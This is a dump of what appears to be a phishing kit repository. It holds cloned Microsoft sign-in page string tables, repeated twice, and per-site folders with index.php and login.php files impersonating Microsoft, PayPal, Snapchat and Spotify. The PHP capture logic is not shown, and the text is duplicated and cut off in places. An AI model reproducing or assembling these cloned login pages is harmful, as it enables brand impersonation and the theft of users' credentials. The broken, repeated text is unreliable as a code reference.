again.",e.CT_OTC_STR_SMSTextbox_Label2="Phone number",e.CT_OTC_STR_SMSTextbox_AriaLabel="Enter your phone number",e.CT_RNGC_STR_TimeOut_Title="Request timeout",e.CT_RNGC_STR_TimeOut_PageDescription="We sent a sign in request to your Microsoft Authenticator app for {0}, but we didn't get your approval.",e.CT_RNGC_STR_Denied_Title="Request denied",e.CT_RNGC_STR_Denied_PageDescription="We sent a sign in request to your Microsoft Authenticator app for {0}, but you denied it.",e.CT_RNGC_STR_Polling_Title="Approve sign in",e.CT_RNGC_STR_Polling_PageDescription="Approve request on your phone to sign in with {0}.",e.CT_RNGC_STR_Polling_PageDescription_UnfamiliarDevice="Tap the number you see below in your Microsoft Authenticator app to sign in with {0}",e.CT_RNGC_STR_ResendNotification_Text="Tap Next to send another request.",e.CT_RNGC_STR_SwitchToPassword_Link="Use your password instead",e.CT_RNGC_STR_SwitchToQrCode_Link="Scan a QR code instead",e.CT_RNGC_STR_QR_PageDescription="Scan the QR code to sign in with {0}.",e.CT_RNGC_STR_SwitchToPolling_Link="Approve a push notification instead",e.CT_RNGC_STR_QR_Timeout_Title="Request timeout",e.CT_RNGC_STR_QR_Timeout_PageDescription="We didn't hear from you in time. Tap Next if you want to try again.",e.CT_RNGC_STR_Error_Title_SendFail="Request wasn't sent",e.CT_RNGC_STR_Error_SendFail="We couldn't send a notification to your phone at this time. Please try again.",e.CT_RNGC_STR_Request="We couldn't send a notification to your phone at this time. Please try again.",e.CT_STR_ViewAgreementError="We didn't receive a response. Please try again.",e.CT_STR_ViewAgreement_ExternalLink="For details, please visit this site: {0}",e.CT_STR_ConfirmSend_Otc_ForceSignin="Because you're accessing sensitive info, we'll send a code to {0} to verify your identity.",e.CT_STR_ConfirmSend_Otc_SendError="We couldn't send a code to your phone at this time. Try again later.",e.CT_STR_ConfirmSend_Otc_SendError_Email="We couldn't send a code to your email at this time. Try again later.",e.CT_STR_ConfirmSend_Otc_Email="We'll send a code to {0} to sign you in.",e.CT_STR_ConfirmSend_Otc_SendCode="Send code",e.CT_STR_ConfirmSend_RemoteNgc="We'll send a sign-in request to your phone to sign in with {0}.",e.CT_STR_ConfirmSend_RemoteNgc_ForceSignin="Because you're accessing sensitive info for {0}, we'll send a request to your phone to verify your identity.",e.CT_STR_ConfirmSend_RemoteNgc_SendNotification="Send notification",e.CT_STR_PhoneDisambiguation_Title="Confirm your phone number",e.CT_STR_CredentialPicker_Title="Verify your identity",e.CT_STR_CredentialPicker_Description="How would you like to verify your identity?",e.CT_STR_CredentialPicker_Option_AuthenticatorApp="Approve a request on my Microsoft Authenticator app",e.CT_STR_CredentialPicker_Option_Fido="Use my FIDO authenticator",e.CT_STR_CredentialPicker_Option_Password="Enter my password",e.CT_PWD_STR_SwitchToCredPicker_Link="Other ways to sign in",e.CT_PWD_STR_SwitchToFido_Link="Sign in with Hello or FIDO",e.CT_PWD_STR_UseGitHub_Link="Sign in with GitHub",e.CT_STR_OptOut_AltText="Close banner",e.CT_PWD_STR_AltCredHint_GitHub="Click here to sign in with GitHub",e.CT_PWD_STR_AltCredHint_AriaLabel_GitHub_CredPicker='Click "Other ways to sign in" to sign in with GitHub',e.CT_PWD_STR_AltCredHint_AriaLabel_GitHub_MoreOptions='Click "More options" to sign in with GitHub',e.CT_FIDO_STR_Page_Title="Use Hello or FIDO to authenticate",e.CT_FIDO_STR_Page_Description="Use Windows Hello or your FIDO device to finish your sign in. If you're not using Hello, follow the instructions that your browser or device manufacturer provided.",e.CT_FIDO_STR_TryAgain_Button="Try again",e.CT_FIDO_STR_Error_NotFound="We couldn't find a FIDO authenticator.",e.CT_FIDO_STR_Error_NotAllowed="The authentication request was canceled.",e.CT_FIDO_STR_Error_Unknown="We had a problem authenticating you. Please try again.",e.WF_STR_Confirm_Signup_Title="Create account",e.WF_STR_Confirm_Signup_Desc="Looks like you're new here. We'll create a new account with {0}.",e.WF_STR_Confirm_Signup_Button="Create account",e.WF_STR_Confirm_Recover_Username_Title="You may already have an account",e.WF_STR_Confirm_Recover_Username_Desc="{0} is already associated with an existing account. Choose 'Back' and enter the username for that account.",e.WF_STR_Confirm_Recover_Username_Instruction="If you don't remember the username for that account, choose 'Next' to recover it.",e.WF_STR_Confirm_Recover_Username_Signup_Link="Create another account",e.CT_FEDCONFLICT_STR_Page_Title="Looks like you already have an account with {0}",e.CT_FEDCONFLICT_STR_UseMicrosoft="Sign in to this account",e.CT_FEDCONFLICT_STR_UseMicrosoft_Help_VSTS="Recommended if you use it with Visual Studio or Microsoft Azure.",e.CT_FEDCONFLICT_STR_UseGitHub="Continue with your GitHub credentials"}),i.registerSource("html",function(e,o){e.CT_FED_STR_FedDomainMsg="To sign in to this account you need to go to #~#partnerdomain#~#.",e.WF_STR_SignUpLink_Text='No account? Create one!',e.CT_OTC_STR_SendCode_SessionExpired='Your session has timed out. To request a single use code, please refresh the page.',e.CT_HRD_STR_Splitter_Rename='Tired of seeing this? Rename your personal Microsoft account.',e.CT_STR_ConfirmSend_Otc='We\'ll send a code to {0} to sign you in. This isn\'t my number',e.CT_STR_CookieBanner_Text='This site uses cookies for analytics, personalized content and ads. By continuing to browse this site, you agree to this use. Learn more',1===o.Bw?(e.CT_PWD_STR_Error_WrongCreds=o.b?"The password is incorrect. Please try again.":'Your account or password is incorrect. If you don\'t remember your password, reset it now.',e.CT_IHL_STR_Error_WrongHip='Enter your password and the characters correctly. If you don\'t remember your password, reset it now.'):(e.CT_PWD_STR_Error_WrongCreds=o.b?"The password is incorrect. Please try again.":'Your account or password is incorrect. If you don\'t remember your password, continue without a Microsoft account.',e.CT_IHL_STR_Error_WrongHip='Enter your password and the characters correctly. If you don\'t remember your password, continue without a Microsoft account.')})},function(e,o){function t(){var e=this,o={};e.registerSource=function(e,t){o[e]=o[e]||[],o[e].push(t)},e.getStrings=function(e,t){for(var i={},n=o[e]||[],r=0,_=n.length;r<_;r++)n[r](i,t);return i}}var i=window;i.StringRepository=e.exports=i.StringRepository||new t},function(e,o){o.Tokens={Username:"#~#MemberName_LS#~#"},o.Fed={DomainToken:"#~#partnerdomain#~#",FedDomain:"#~#FederatedDomainName_LS#~#",Partner:"#~#FederatedPartnerName_LS#~#"},o.LoginOption={DoNotRemember:0,RememberPWD:1,NothingChecked:3},o.StringsVariantId={Default:0,SkypeMoveAlias:1,CombinedSigninSignup:2,CombinedSigninSignupDefaultTitle:3,RemoteConnectLogin:4,CombinedSigninSignupV2:5,CombinedSigninSignupV2WelcomeTitle:6},o.AllowedIdentitiesType={MsaOnly:0,AadOnly:1,Both:2},o.SessionIdp={Aad:0,Msa:1}},function(e,o){e.exports={format:function(e){for(var o=1;oWhat\'s this?';break;case _.RemoteConnectLogin:e.WF_STR_Default_Desc='Use your Microsoft account to sign in to {0}. What\'s this?';break;case _.CombinedSigninSignupV2:e.WF_STR_Default_Desc="We'll check to see if you already have a Microsoft account.";break;case _.CombinedSigninSignupV2WelcomeTitle:e.WF_STR_Default_Desc="Let's see if you already have an account with us."}e.WF_STR_LearnMoreLink_Text="What's this?",e.WF_STR_ProgressText="Please wait",e.WF_STR_ThisIsntMyNumber_Text="This isn't my number",e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.CT_STR_More_Options_Ellipsis_AriaLabel="Click here for more options",e.CT_STR_Error_Details_Close_AltText="Close error details",e.MOBILE_STR_Footer_Microsoft="Microsoft",e.MOBILE_STR_Footer_Privacy="Privacy & cookies",e.MOBILE_STR_Footer_Terms="Terms of use",e.WF_STR_Footer_LinkDisclaimer_Text="Link Disclaimer",e.WF_STR_GenericError_Title="Something went wrong and we can't sign you in right now. Please try again later.",e.CT_PWD_STR_Email_Example="Email, phone, or Skype",e.CT_PWD_STR_Username_AriaLabel="Enter your email, phone, or Skype.",e.CT_STR_CountryCodeError="Please verify the country code.",e.CT_PWD_STR_PwdTB_Label="Password",e.CT_PWD_STR_PwdTB_AriaLabel="Enter password",e.CT_WPIL_STR_Android_UseDifferentAddress="Use a different account",e.CT_PWD_STR_ForgotPwdLink_Text="Forgot my password",e.CT_PWD_STR_ForgotPwdLink_SplitterText="What kind of account do you have?",e.CT_PWD_STR_KeepMeSignedInCB_Text="Keep me signed in",e.CT_PWD_STR_SignIn_Button="Sign in",e.CT_PWD_STR_SignIn_Button_Next="Next",e.CT_PWD_STR_SwitchToOTC_Link="Sign in with a single-use code",e.CT_PWD_STR_SwitchToRemoteNGC_Link="Use the Microsoft Authenticator app instead",e.CT_PWD_STR_SignUp_MenuLink="Create an account",e.CT_PWD_STR_MoreOptions_Link="More options",e.CT_PWD_STR_MoreOptions_Link_AriaLabel="Show additional options for signing in",e.CT_PWD_STR_Error_InvalidUsername="Enter a valid email address, phone number, or Skype name.",e.CT_PWD_STR_Error_GetCredentialTypeError="There was an issue looking up your account. Tap Next to try again.",e.CT_PWD_STR_Error_InvalidPhoneNumber="That phone number doesn't look right. Please check the country code and phone number.",e.CT_PWD_STR_Error_InvalidPhoneFormatting="The phone number you entered isn't valid. Your phone number can contain numbers, spaces, and these special characters: ( ) [ ] . - # * /",e.CT_PWD_STR_Error_MissingPassword="Please enter the password for your Microsoft account.",e.CT_PWD_STR_Error_FedNotAllowed="You cannot use this account for this purpose because it belongs to an organization. Please choose a different account or sign up for a new one.",e.CT_PWD_STR_Error_UsernameNotExist=o.AP?'That Microsoft account doesn\'t exist. Enter a different account or get a new one.':"That Microsoft account doesn't exist. Please enter a different account.",e.CT_PWD_STR_PersistentCookies_Warning="Your account will be remembered on this device.",e.CT_FED_STR_ChangeUserLink_Text="Sign in with a different Microsoft account",e.CT_FED_STR_GoThereLink_Text="Sign in at #~#partnerdomain#~#",e.WF_STR_ForceSI_Info="Because you're accessing sensitive info, you need to verify your password.",e.WF_STR_SwitchUser_Title="You're already signed in.",e.WF_STR_SwitchUser_Stay="Remain signed in with this account.",e.WF_STR_SwitchUser_Switch="Sign out and sign in with a different account.",e.WF_STR_Switch_SignOutDesc="(You will be signed out of all Microsoft services you are using currently with your #~#FederatedDomainName_LS#~# account.)",e.WF_STR_Switch_DifferentID="Sign in with a different Microsoft account",e.WF_STR_InviteBlocked_Error="Sorry, you can't use your #~#FederatedDomainName_LS#~# account to sign in here.",e.WF_STR_ServiceBlocked_Error="Sorry, we can't sign you in here with your #~#FederatedDomainName_LS#~# account.",e.WF_STR_IDPFailed_GenericError="Your organization could not sign you in to this service.",e.WF_STR_IDPFailed_Error="#~#FederatedPartnerName_LS#~# could not sign you in here.",e.WF_STR_IDPFailed_Desc1="Your #~#FederatedDomainName_LS#~# account may not be enabled to use this service or there may be a system error at #~#FederatedPartnerName_LS#~#.",e.WF_STR_IDPFailed_Desc2=" Please try again later, and contact the administrator at #~#FederatedPartnerName_LS#~# if this problem persists.",e.WF_STR_IDPFailed_GenericDesc="Please try again later, and contact the administrator at your organization if this problem persists.",e.MOBILE_STR_SignIn_MSAcctHelpHeading="What is a Microsoft account?",e.MOBILE_STR_SignIn_MSAcctHelpDesc="A Microsoft account is what you use to sign in to Microsoft services such as Outlook.com, Skype, OneDrive, Office, Xbox, Windows and more. Sign in for your personalized experience.",e.MOBILE_STR_SignIn_MSAcctHelpDone_Button="OK",e.CT_HIP_ID_P_HipLockout_Info="Help us make sure you're not a robot.",e.CT_HIP_STR_HIP_ISLOADING="Loading ...",e.WF_STR_Lockout_AnotherID_Text="Sign in using another Microsoft account",e.WF_STR_Lockout_Title="Sign-in is blocked",e.WF_STR_Lockout_Desc="Sign-in with #~#MemberName_LS#~# is blocked for one of these reasons:",e.WF_STR_Lockout_Reason1="Someone entered the wrong password too many times.",e.WF_STR_Lockout_Reason2="If you signed up for this account through an organization, you might not be able to use it yet.",e.WF_STR_Lockout_Reset_Text="Reset your password",e.WF_STR_HIP_Label="Enter these characters",e.WF_STR_HIPAudio_Label="Enter the characters you hear",e.CT_PWD_STR_Continue_Button="Continue",e.CT_PWD_STR_ContinueBtn_Tooltip="You are signed in on this computer with this Microsoft account.",e.CT_PWD_STR_SignedIn_Label="You're already signed in",e.CT_HRD_STR_Splitter_Heading="It looks like this email is used with more than one account from Microsoft. Which one do you want to use?",e.CT_HRD_STR_Splitter_Error_Heading="We're having trouble locating your account. Which type of account do you want to use?",e.CT_HRD_STR_Splitter_AadTile_Title="Work or school account",e.CT_HRD_STR_Splitter_AadTile_Hint="Created by your IT department",e.CT_HRD_STR_Splitter_MsaTile_Title="Personal account",e.CT_HRD_STR_Splitter_MsaTile_Hint="Created by you",e.CT_HRD_STR_Redirect_Title_GitHub="Taking you to the GitHub sign-in page...",e.CT_HRD_STR_Splitter_Back="Back",e.CT_HRD_STR_Redirect_Title="Taking you to your organization's sign-in page",e.CT_HRD_STR_Redirect_Cancel="Cancel",e.WF_STR_FIDO_ReAuthUserPrompt="Use your PIN or Windows Hello to prove you own {0}",e.CT_IL_STR_Error_OldSkypePwd="Your old Skype password doesn't work anymore. Try the password for your Microsoft account.",e.CT_PWD_STR_EnterPassword_Title="Enter password",e.CT_PWD_STR_RemoteConnect_PasswordPage_Desc="Enter the password to sign in to {0} with {1}",e.CT_OTC_STR_SignIn_ReSendInfo="It may take a few minutes for the code to arrive. Are you sure you want to request a new code?",e.CT_OTC_STR_YesButton_Text="Yes",e.CT_OTC_STR_NoButton_Text="No",e.CT_OTC_STR_EnterCode_Title="Enter code",e.CT_OTC_STR_EnterCode_Desc="We just sent a code to {0}",e.CT_OTC_STR_EnterCode_Text="Code",e.CT_OTC_STR_EnterCode_AriaLabel="Enter the code you received",e.CT_OTC_STR_Error_EmptyCode="To continue, enter the code we just sent you.",e.CT_OTC_STR_Error_CodeIncorrect="That code didn't work. Check the code and try again.",e.CT_OTC_STR_Error_ServerError="This service isn't available right now. Please try again later.",e.CT_OTC_STR_Error_OTCInvalid="Please enter the 7-digit code. The code only contains numbers.",e.CT_OTC_STR_Error_SendCodeError="We couldn't send the code. Please try again.",e.CT_OTC_STR_SMSTextbox_Label2="Phone number",e.CT_OTC_STR_SMSTextbox_AriaLabel="Enter your phone number",e.CT_RNGC_STR_TimeOut_Title="Request timeout",e.CT_RNGC_STR_TimeOut_PageDescription="We sent a sign in request to your Microsoft Authenticator app for {0}, but we didn't get your approval.",e.CT_RNGC_STR_Denied_Title="Request denied",e.CT_RNGC_STR_Denied_PageDescription="We sent a sign in request to your Microsoft Authenticator app for {0}, but you denied it.",e.CT_RNGC_STR_Polling_Title="Approve sign in",e.CT_RNGC_STR_Polling_PageDescription="Approve the request we sent to your phone to sign in.",e.CT_RNGC_STR_Polling_PageDescription_UnfamiliarDevice="Tap the number you see below in your Microsoft Authenticator app to sign in.",e.CT_RNGC_STR_ResendNotification_Text="Tap Next to send another request.",e.CT_RNGC_STR_SwitchToPassword_Link="Use your password instead",e.CT_RNGC_STR_SwitchToQrCode_Link="Scan a QR code instead",e.CT_RNGC_STR_QR_PageDescription="Scan the QR code to sign in with {0}.",e.CT_RNGC_STR_SwitchToPolling_Link="Approve a push notification instead",e.CT_RNGC_STR_QR_Timeout_Title="Request timeout",e.CT_RNGC_STR_QR_Timeout_PageDescription="We didn't hear from you in time. Tap Next if you want to try again.",e.CT_RNGC_STR_Error_Title_SendFail="Request wasn't sent",e.CT_RNGC_STR_Error_SendFail="We couldn't send a notification to your phone at this time. Please try again.",e.CT_RNGC_STR_Request="We couldn't send a notification to your phone at this time. Please try again.",e.CT_STR_ViewAgreementError="We didn't receive a response. Please try again.",e.CT_STR_ViewAgreement_ExternalLink="For details, please visit this site: {0}",e.CT_STR_ConfirmSend_Otc_ForceSignin="Because you're accessing sensitive info, we'll send a code to {0} to verify your identity.",e.CT_STR_ConfirmSend_Otc_SendError="We couldn't send a code to your phone at this time. Try again later.",e.CT_STR_ConfirmSend_Otc_SendError_Email="We couldn't send a code to your email at this time. Try again later.",e.CT_STR_ConfirmSend_Otc_Email="We'll send a code to {0} to sign you in.",e.CT_STR_ConfirmSend_Otc_SendCode="Send code",e.CT_STR_ConfirmSend_RemoteNgc="We'll send a sign-in request to your phone to sign in with {0}.",e.CT_STR_ConfirmSend_RemoteNgc_ForceSignin="Because you're accessing sensitive info for {0}, we'll send a request to your phone to verify your identity.",e.CT_STR_ConfirmSend_RemoteNgc_SendNotification="Send notification",e.CT_STR_PhoneDisambiguation_Title="Confirm your phone number",e.CT_STR_CredentialPicker_Title="Verify your identity",e.CT_STR_CredentialPicker_Description="How would you like to verify your identity?",e.CT_STR_CredentialPicker_Option_AuthenticatorApp="Approve a request on my Microsoft Authenticator app",e.CT_STR_CredentialPicker_Option_Fido="Use my FIDO authenticator",e.CT_STR_CredentialPicker_Option_Password="Enter my password",e.CT_PWD_STR_SwitchToCredPicker_Link="Other ways to sign in",e.CT_PWD_STR_SwitchToFido_Link="Sign in with Hello or FIDO",e.CT_PWD_STR_UseGitHub_Link="Sign in with GitHub",e.CT_STR_OptOut_AltText="Close banner",e.CT_PWD_STR_AltCredHint_GitHub="Click here to sign in with GitHub",e.CT_PWD_STR_AltCredHint_AriaLabel_GitHub_CredPicker='Click "Other ways to sign in" to sign in with GitHub',e.CT_PWD_STR_AltCredHint_AriaLabel_GitHub_MoreOptions='Click "More options" to sign in with GitHub',e.CT_FIDO_STR_Page_Title="Use Hello or FIDO to authenticate",e.CT_FIDO_STR_Page_Description="Use Windows Hello or your FIDO device to finish your sign in. If you're not using Hello, follow the instructions that your browser or device manufacturer provided.",e.CT_FIDO_STR_TryAgain_Button="Try again",e.CT_FIDO_STR_Error_NotFound="We couldn't find a FIDO authenticator.",e.CT_FIDO_STR_Error_NotAllowed="The authentication request was canceled.",e.CT_FIDO_STR_Error_Unknown="We had a problem authenticating you. Please try again.",e.WF_STR_Confirm_Signup_Title="Create account",e.WF_STR_Confirm_Signup_Desc="Looks like you're new here. We'll create a new account with {0}.",e.WF_STR_Confirm_Signup_Button="Create account",e.WF_STR_Confirm_Recover_Username_Title="You may already have an account",e.WF_STR_Confirm_Recover_Username_Desc="{0} is already associated with an existing account. Choose 'Back' and enter the username for that account.",e.WF_STR_Confirm_Recover_Username_Instruction="If you don't remember the username for that account, choose 'Next' to recover it.",e.WF_STR_Confirm_Recover_Username_Signup_Link="Create another account",e.CT_FEDCONFLICT_STR_Page_Title="Looks like you already have an account with {0}",e.CT_FEDCONFLICT_STR_UseMicrosoft="Sign in to this account",e.CT_FEDCONFLICT_STR_UseMicrosoft_Help_VSTS="Recommended if you use it with Visual Studio or Microsoft Azure.",e.CT_FEDCONFLICT_STR_UseGitHub="Continue with your GitHub credentials"}),i.registerSource("html",function(e,o){e.CT_FED_STR_FedDomainMsg="To sign in to this account you need to go to #~#partnerdomain#~#.",e.WF_STR_SignUpLink_Text='No account? Create one!',e.CT_OTC_STR_SendCode_SessionExpired='Your session has timed out. To request a single use code, please refresh the page.',e.CT_HRD_STR_Splitter_Rename='Tired of seeing this? Rename your personal Microsoft account.',e.CT_STR_ConfirmSend_Otc='We\'ll send a code to {0} to sign you in. This isn\'t my number',e.CT_STR_CookieBanner_Text='This site uses cookies for analytics, personalized content and ads. By continuing to browse this site, you agree to this use. Learn more',1===o.B2?(e.CT_PWD_STR_Error_WrongCreds=o.c?"The password is incorrect. Please try again.":'Your account or password is incorrect. If you don\'t remember your password, reset it now.',e.CT_IHL_STR_Error_WrongHip='Enter your password and the characters correctly. If you don\'t remember your password, reset it now.'):(e.CT_PWD_STR_Error_WrongCreds=o.c?"The password is incorrect. Please try again.":'Your account or password is incorrect. If you don\'t remember your password, continue without a Microsoft account.',e.CT_IHL_STR_Error_WrongHip='Enter your password and the characters correctly. If you don\'t remember your password, continue without a Microsoft account.')})},function(e,o){function t(){var e=this,o={};e.registerSource=function(e,t){o[e]=o[e]||[],o[e].push(t)},e.getStrings=function(e,t){for(var i={},n=o[e]||[],r=0,_=n.length;r<_;r++)n[r](i,t);return i}}var i=window;i.StringRepository=e.exports=i.StringRepository||new t},function(e,o){o.Tokens={Username:"#~#MemberName_LS#~#"},o.Fed={DomainToken:"#~#partnerdomain#~#",FedDomain:"#~#FederatedDomainName_LS#~#",Partner:"#~#FederatedPartnerName_LS#~#"},o.LoginOption={DoNotRemember:0,RememberPWD:1,NothingChecked:3},o.StringsVariantId={Default:0,SkypeMoveAlias:1,CombinedSigninSignup:2,CombinedSigninSignupDefaultTitle:3,RemoteConnectLogin:4,CombinedSigninSignupV2:5,CombinedSigninSignupV2WelcomeTitle:6},o.AllowedIdentitiesType={MsaOnly:0,AadOnly:1,Both:2},o.SessionIdp={Aad:0,Msa:1}},function(e,o){e.exports={format:function(e){for(var o=1;oassets -------------------------------------------------------------------------------- /sites/microsoft/ellipsis_white.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /sites/microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/microsoft/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/microsoft/microsoft_logo.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /sites/microsoft/prefetch.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Prefetch 5 | 6 | 7 | 8 | 14 | 15 | 16 | 20 | 21 | 22 | 23 | 24 | A -------------------------------------------------------------------------------- /sites/microsoft/sprite1.css: -------------------------------------------------------------------------------- 1 | .image-adchoices_icon-png{background:url('adchoices_icon.png');width:12px;height:12px}.image-olk_logo_white_cropped-png{background:url('olk_logo_white_cropped.png');width:265px;height:310px}.image-owa_brand-png{background:url('owa_brand.png');width:160px;height:30px}.image-readingpane_recipientwell_callout-png{background:url('readingpane_recipientwell_callout.png');width:370px;height:245px}.image-loading_blackbg-gif{background:url('loading_blackbg.gif');width:16px;height:16px}.image-loading_whitebg-gif{background:url('loading_whitebg.gif');width:16px;height:16px}.image-thinking16_blue-gif{background:url('thinking16_blue.gif');width:16px;height:16px}.image-thinking16_grey-gif{background:url('thinking16_grey.gif');width:16px;height:16px}.image-thinking16_white-gif{background:url('thinking16_white.gif');width:16px;height:16px}.image-thinking24-gif{background:url('thinking24.gif');width:24px;height:24px}.image-thinking32_blue-gif{background:url('thinking32_blue.gif');width:32px;height:32px}.image-thinking32_grey-gif{background:url('thinking32_grey.gif');width:32px;height:32px}.image-thinking32_white-gif{background:url('thinking32_white.gif');width:32px;height:32px}.image-r_jpg-png{width:75px;height:75px;background:url('sprite1.mouse.png') -0 -0}.image-clutter_delete_all-png{width:32px;height:32px;background:url('sprite1.mouse.png') -77px -0}.image-clutter_delete_all_p-png{width:32px;height:32px;background:url('sprite1.mouse.png') -111px -0}.image-listview_buscheck_single-png{width:16px;height:32px;background:url('sprite1.mouse.png') -145px -0}.image-listview_buscheck_top-png{width:16px;height:32px;background:url('sprite1.mouse.png') -163px -0}.image-listview_busstop_bottom-png{width:16px;height:32px;background:url('sprite1.mouse.png') -181px -0}.image-listview_busstop_empty-png{width:16px;height:32px;background:url('sprite1.mouse.png') -199px -0}.image-listview_busstop_middle-png{width:16px;height:32px;background:url('sprite1.mouse.png') -217px -0}.image-office_logo_white_small-png{width:81px;height:26px;background:url('sprite1.mouse.png') -235px -0}.image-dc-gdoc-png{width:20px;height:20px;background:url('sprite1.mouse.png') -318px -0}.image-dc-gsheet-png{width:20px;height:20px;background:url('sprite1.mouse.png') -340px -0}.image-dc-gslide-png{width:20px;height:20px;background:url('sprite1.mouse.png') -362px -0}.image-fberror4-png{width:18px;height:18px;background:url('sprite1.mouse.png') -384px -0}.image-googerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -404px -0}.image-lierror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -424px -0}.image-sinweerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -444px -0}.image-twitrerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -464px -0}.image-yhooerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -484px -0}.image-abchactive1-png{width:16px;height:16px;background:url('sprite1.mouse.png') -504px -0}.image-chevrons_down-png{width:16px;height:16px;background:url('sprite1.mouse.png') -522px -0}.image-close_p-png{width:16px;height:16px;background:url('sprite1.mouse.png') -540px -0}.image-dc-accdb-png{width:16px;height:16px;background:url('sprite1.mouse.png') -558px -0}.image-dc-aspx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -576px -0}.image-dc-bmp-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -22px}.image-dc-docx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -22px}.image-dc-exe-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -22px}.image-dc-generic-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -22px}.image-dc-gif-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -22px}.image-dc-jpg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -22px}.image-dc-lync-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -22px}.image-dc-mpg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -22px}.image-dc-msg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -22px}.image-dc-msg_attachment-png{width:16px;height:16px;background:url('sprite1.mouse.png') -480px -22px}.image-dc-one-png{width:16px;height:16px;background:url('sprite1.mouse.png') -498px -22px}.image-dc-pblsh-png{width:16px;height:16px;background:url('sprite1.mouse.png') -516px -22px}.image-dc-pdf-png{width:16px;height:16px;background:url('sprite1.mouse.png') -534px -22px}.image-dc-png-png{width:16px;height:16px;background:url('sprite1.mouse.png') -552px -22px}.image-dc-pptx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -570px -22px}.image-dc-rpmsg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -40px}.image-dc-txt-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -40px}.image-dc-vsd-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -40px}.image-dc-wv-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -40px}.image-dc-xlsx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -40px}.image-dc-zip-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -40px}.image-event_accepted-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -40px}.image-event_declined-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -40px}.image-event_tentative-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -40px}.image-fbactive4-png{width:16px;height:16px;background:url('sprite1.mouse.png') -480px -40px}.image-googactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -498px -40px}.image-liactive-png{width:16px;height:16px;background:url('sprite1.mouse.png') -516px -40px}.image-mark_not_clutter-png{width:16px;height:16px;background:url('sprite1.mouse.png') -534px -40px}.image-mark_not_clutter_h-png{width:16px;height:16px;background:url('sprite1.mouse.png') -552px -40px}.image-response_approve-png{width:16px;height:16px;background:url('sprite1.mouse.png') -570px -40px}.image-response_reject-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -58px}.image-response_request-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -58px}.image-sinweactive-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -58px}.image-skypeactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -58px}.image-task_red-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -58px}.image-task_red_h-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -58px}.image-twitractive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -58px}.image-voicemail_irm-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -58px}.image-yhooactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -58px}.image-task_reoccurring-png{width:15px;height:16px;background:url('sprite1.mouse.png') -480px -58px}.image-task-png{width:14px;height:16px;background:url('sprite1.mouse.png') -497px -58px}.image-triangle_down_small-png{width:12px;height:12px;background:url('sprite1.mouse.png') -513px -58px}.image-navigation_close-png{width:11px;height:11px;background:url('sprite1.mouse.png') -527px -58px}.image-clear1x1-gif{width:1px;height:1px;background:url('sprite1.mouse.png') -540px -58px}.csimg{padding:0;border:none;background-repeat:no-repeat;-webkit-touch-callout:none}span.csimg{-ms-high-contrast-adjust:none} -------------------------------------------------------------------------------- /sites/microsoft/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/7c4b889385e3c163ea8af391dcc6518509e964a7/sites/microsoft/sprite1.png -------------------------------------------------------------------------------- /sites/paypal/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/paypal/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/snapchat/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/snapchat/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/spotify/anchor.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 175 | 176 | 177 | 180 |
181 | 182 | 197 |
protected by reCAPTCHA
